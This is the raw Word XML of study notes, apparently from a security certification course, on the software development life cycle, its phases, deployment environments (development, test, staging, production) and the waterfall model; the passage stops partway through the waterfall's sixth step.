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09108" w14:textId="346496E6" w:rsidR="0069794A" w:rsidRDefault="0069794A" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Essentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49BB8A" w14:textId="5CB27F4D" w:rsidR="0069794A" w:rsidRDefault="0069794A" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Know how to analyze the indicators associated with application attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F632FE" w14:textId="41C2FD67" w:rsidR="0069794A" w:rsidRDefault="0069794A" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Understand secure software development concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CCD760" w14:textId="1DBF4659" w:rsidR="0069794A" w:rsidRDefault="0021247C" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Explain secure code deployment and automation concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C1D50" w14:textId="1B311156" w:rsidR="0021247C" w:rsidRDefault="0021247C" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Know how to implement database security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F34E33" w14:textId="25F3E1BE" w:rsidR="0021247C" w:rsidRDefault="0021247C" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Know how to implement application security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCAF2F0" w14:textId="77777777" w:rsidR="0021247C" w:rsidRDefault="0021247C" w:rsidP="005744CD">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCCB3F6" w14:textId="5FC8EB3E" w:rsidR="00601D58" w:rsidRPr="00372BF0" w:rsidRDefault="003414BE" w:rsidP="005744CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372BF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Software Development Life Cycle (SDLC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8AF05" w14:textId="1C5AABEA" w:rsidR="003414BE" w:rsidRDefault="00AF64AC" w:rsidP="003414B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Describes the steps in a model for software development throughout its life. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72DBBC" w14:textId="6AEA5874" w:rsidR="00216F31" w:rsidRDefault="00216F31" w:rsidP="003414B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Maps software creation from an idea to requirements gathering and analysis to design, coding, testing, and rollout. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0244E7" w14:textId="7F0204E0" w:rsidR="00F849A3" w:rsidRDefault="00F849A3" w:rsidP="00F849A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Once software is in production, it also includes user training, maintenance, and decommissioning at the end of the software package’s useful life.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EF184" w14:textId="2F2D5D6C" w:rsidR="003B5BB7" w:rsidRDefault="003B5BB7" w:rsidP="003B5BB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SDLC</w:t>
      </w:r>
      <w:r w:rsidR="00933892">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps provide a consistent framework to structure workflow and providing planning for the development process, but it is not always the best choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDE0E0" w14:textId="18A8B7EE" w:rsidR="00DB18AA" w:rsidRPr="00372BF0" w:rsidRDefault="00DB18AA" w:rsidP="00DB18AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372BF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Software Development Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22001460" w14:textId="5A587B28" w:rsidR="00DB18AA" w:rsidRDefault="00752F20" w:rsidP="00DB18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Regardless of specific SDLC model or process, a </w:t>
      </w:r>
      <w:r w:rsidR="00372BF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>few phases usually appear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43932176" w14:textId="2CB69C8D" w:rsidR="00372BF0" w:rsidRDefault="00372BF0" w:rsidP="00372BF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w:t>
      </w:r>
      <w:r w:rsidRPr="00372BF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Feasibility Phase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is where initial investigations into whether the effort should occur are conducted. Feasibility also looks at alternative solutions and high-level costs for each solution proposed. It results in a recommendation with a plan to move forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D87386A" w14:textId="61D0D4B3" w:rsidR="00372BF0" w:rsidRDefault="00372BF0" w:rsidP="00372BF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Once an effort has been deemed feasible, it will typically go through an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72A10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analysis and requirements definition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase. In this phase customer input is </w:t>
      </w:r>
      <w:r w:rsidR="00292798">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sought</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine what the desired functionality is, what the current system or application currently doe</w:t>
      </w:r>
      <w:r w:rsidR="00D72A10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s and what it doesn’t do, and what improvements are desired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BC74E" w14:textId="4CCAB199" w:rsidR="00964A90" w:rsidRDefault="00964A90" w:rsidP="00372BF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w:t>
      </w:r>
      <w:r w:rsidRPr="002B1B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase includes design for functionality, architecture, integration points and techniques, dataflow, business processes</w:t>
      </w:r>
      <w:r w:rsidR="00754F36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and any other elements that require design consideration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC2E17" w14:textId="36145FBA" w:rsidR="00754F36" w:rsidRDefault="00754F36" w:rsidP="00372BF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w:t>
      </w:r>
      <w:r w:rsidRPr="00C556D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase is where the coding of the application occurs and may involve testing of parts of the software, including </w:t>
      </w:r>
      <w:r w:rsidRPr="00C556D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unit testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where small components </w:t>
      </w:r>
      <w:r w:rsidR="00C556D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>are individually tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD21D5" w14:textId="25CB3C69" w:rsidR="00C556D8" w:rsidRDefault="003765AC" w:rsidP="00372BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE14D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing and Integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase is where the formal testing with customers and </w:t>
      </w:r>
      <w:r w:rsidR="00924E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>people outside the development team occurs</w:t>
      </w:r>
      <w:r w:rsidR="0022331F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This means the software may be running along external services and data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5AE2B8" w14:textId="6D9D10BF" w:rsidR="0022331F" w:rsidRDefault="00EE14D7" w:rsidP="0022331F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE14D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User acceptance testing (UAT)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> also occurs to ensure that the users of the software are satisfied with its functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8A597" w14:textId="68EC5886" w:rsidR="00185DB3" w:rsidRDefault="00612A51" w:rsidP="00185DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82FDB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Training and Transition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase is where important task of ensuring that the end users are trained on the software and that the software has entered general use occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527321C" w14:textId="13E68E4C" w:rsidR="00612A51" w:rsidRDefault="00612A51" w:rsidP="00612A5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Aka </w:t>
      </w:r>
      <w:r w:rsidR="00367894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the acceptance, installation, and deployment phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817EBC5" w14:textId="603B9863" w:rsidR="00A82FDB" w:rsidRDefault="00A82FDB" w:rsidP="00A82FDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F675B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ongoing operations and maintenance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F5C23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00D97B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the longest phase and </w:t>
      </w:r>
      <w:r w:rsidR="00F675B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">occurs after the project reaches completion. This phase includes patching, updating, minor modifications, and other work that goes into daily support. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219D87E" w14:textId="00CCB084" w:rsidR="00042C10" w:rsidRDefault="005C30D5" w:rsidP="00042C1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w:t>
      </w:r>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase occurs when a product or system reaches the end of its life. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFB8F7" w14:textId="6DB2B2C7" w:rsidR="003E09C8" w:rsidRPr="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code Deployment Environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47ABDA" w14:textId="448594F0" w:rsidR="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C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Many organizations use multiple environments for their software and systems development and testing. The names and specific purposes for these systems vary depending on organizational needs, </w:t>
      </w:r>
      <w:r w:rsidR="0078759F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ut the most common environments are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC748E" w14:textId="1D8BCAE4" w:rsidR="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C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w:t>
      </w:r>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>development environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically used for developers or other “builders” to do their work. Some workflows provide each developer with their own development environment; others use a shared development environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F388804" w14:textId="030A9783" w:rsidR="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C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w:t>
      </w:r>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is where the software or systems can be tested without impacting the production environment. In some schemes, this is preproduction, whereas in others a separate preproduction staging environment is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242F651" w14:textId="7CBF1577" w:rsidR="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Quality assurance (QA) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>activities take place in the test environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE407C" w14:textId="7EDB60B6" w:rsidR="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C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w:t>
      </w:r>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>staging environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a transition environment for code that has successfully cleared testing and is waiting to be deployed into production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7C748" w14:textId="6B352930" w:rsidR="003E09C8" w:rsidRDefault="003E09C8" w:rsidP="003E09C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w:t>
      </w:r>
      <w:r w:rsidRPr="003E09C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>production environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the live stream. Software, patches, and other changes that have been tested and approved move to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55D56D" w14:textId="7B2085AB" w:rsidR="003E09C8" w:rsidRPr="005B612A" w:rsidRDefault="007013AC" w:rsidP="007013AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B612A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Software Development Models:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E63994" w14:textId="76C5186B" w:rsidR="007013AC" w:rsidRDefault="003020D2" w:rsidP="007013A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Many organizations choose elements of one or more SDLC models to best fit their organization style, workflow, and requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD142FE" w14:textId="7F4E3641" w:rsidR="003020D2" w:rsidRPr="005B612A" w:rsidRDefault="003020D2" w:rsidP="003020D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B612A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Waterfall:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF349C" w14:textId="18511483" w:rsidR="003020D2" w:rsidRDefault="003020D2" w:rsidP="003020D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 sequential model in which each phase is followed by the next phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21185B84" w14:textId="773B596C" w:rsidR="003020D2" w:rsidRDefault="003020D2" w:rsidP="003020D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Phases do not overlap, and each logically leads to the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928BF1B" w14:textId="3FD3E14F" w:rsidR="007263C1" w:rsidRDefault="007263C1" w:rsidP="003020D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Typically, six phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DCAA8" w14:textId="17596C3B" w:rsidR="007263C1" w:rsidRDefault="007263C1" w:rsidP="007263C1">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1. Requirements are gathered and documented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD62E0" w14:textId="294D5E72" w:rsidR="007263C1" w:rsidRDefault="007263C1" w:rsidP="007263C1">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2. Involved analysis intended to build business rules and models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F43788" w14:textId="16FFEF1C" w:rsidR="007263C1" w:rsidRDefault="007263C1" w:rsidP="007263C1">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3. </w:t>
      </w:r>
      <w:r w:rsidR="0001585A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A software architecture is designed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450E7117" w14:textId="5AA5AFEE" w:rsidR="0001585A" w:rsidRDefault="0001585A" w:rsidP="007263C1">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4. </w:t>
      </w:r>
      <w:r w:rsidR="00FA5A9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Coding and integration of the software occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076E12D" w14:textId="5EDA73A2" w:rsidR="00FA5A9B" w:rsidRDefault="00FA5A9B" w:rsidP="007263C1">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lastRenderedPageBreak/>
        <w:t>5. Once the software is complete, there is testing and debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3F341" w14:textId="4A4805C9" w:rsidR="00FA5A9B" w:rsidRDefault="00FA5A9B" w:rsidP="007263C1">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6. </w:t>
      </w:r>
      <w:r w:rsidR="007058B8">
        <w:rPr>
